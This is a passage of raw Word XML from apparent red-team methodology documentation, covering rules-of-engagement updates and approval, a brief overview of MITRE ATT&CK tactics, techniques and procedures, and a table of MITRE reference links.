        <w:t>The ROE must be updated when the target space, authorized actions, objectives, or scope are changed. For instance, the original scope may be limited to computer network attacks. If physical attacks are planned, the ROE must be updated to reflect the additional activities and controls. The Red Team Lead will address suggestions or adjustments to the ROE. Each review result must be provided to the originator. The final ROE must be approved by a Trusted Agent in senior management of the target environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10762FD5" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058CF95F" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56948467" w14:textId="1ADDC686" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK™) is a curated knowledge base and model for cyber adversary </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
        <w:t xml:space="preserve">, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&amp;CK is useful for understanding security risk against known adversary </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
        <w:t xml:space="preserve">, for planning security improvements, and verifying </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
        <w:t xml:space="preserve"> work as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BA8C71" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B16FE65" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFC7072" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3752A2FC" w14:textId="15EC9756" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1134"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B59267E" wp14:editId="093E4CEB">
            <wp:extent cx="7271416" cy="350520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288939" cy="3513647"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BE71F" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35196722" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>ATT&amp;CK is broken into Tactics, Techniques, and Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9649C9" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tactics</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> are the tactical goals a threat may use during an operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629973F7" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> describe the actions threats take to achieve their objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3402C3AA" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> are the technical steps required to perform the action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919310A" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>This frameworks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a classification of all threat actions regardless of the underlying vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067B3623" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red teams can emulate realistic TTPs through research and experience. Much of this information has been complied </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>in to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ATT&amp;CK. ATT&amp;CK can be thought of a menu of TTPs. Red teams can use this to ensure they have a comprehensive set of threat TTPs, and blue teams can use this to build a scorecard of how well they are able to defend against various TTPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8869A" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:anchor="references" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00B517C0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FF500B2" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2977"/>
        <w:gridCol w:w="6049"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B517C0" w:rsidRPr="00B517C0" w14:paraId="44493AAE" w14:textId="77777777" w:rsidTr="00B517C0">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70B08A06" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B517C0">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6049" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FABFE58" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B517C0">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B517C0" w:rsidRPr="00B517C0" w14:paraId="4B822976" w14:textId="77777777" w:rsidTr="00B517C0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="485CEE57" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B517C0">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6049" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3030643C" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00B517C0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/wiki/Main_Page</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B517C0" w:rsidRPr="00B517C0" w14:paraId="3D8357E7" w14:textId="77777777" w:rsidTr="00B517C0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B7D81A3" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B517C0">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PRE-ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6049" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78E32806" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00B517C0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/pre-attack/index.php/Main_Page</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B517C0" w:rsidRPr="00B517C0" w14:paraId="5B9960B9" w14:textId="77777777" w:rsidTr="00B517C0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72D01E25" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B517C0">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>ATT&amp;CK Navigator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6049" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35215A7E" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00B517C0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/the-attck%E2%84%A2-navigator-a-new-open-source</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B517C0" w:rsidRPr="00B517C0" w14:paraId="7AF024CA" w14:textId="77777777" w:rsidTr="00B517C0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="262087F4" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B517C0">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ATT&amp;CK Navigator Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6049" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="490C60F3" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00B517C0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://mitre.github.io/attack-navigator/enterprise/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="187B64E0" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED95438" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574C0A42" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
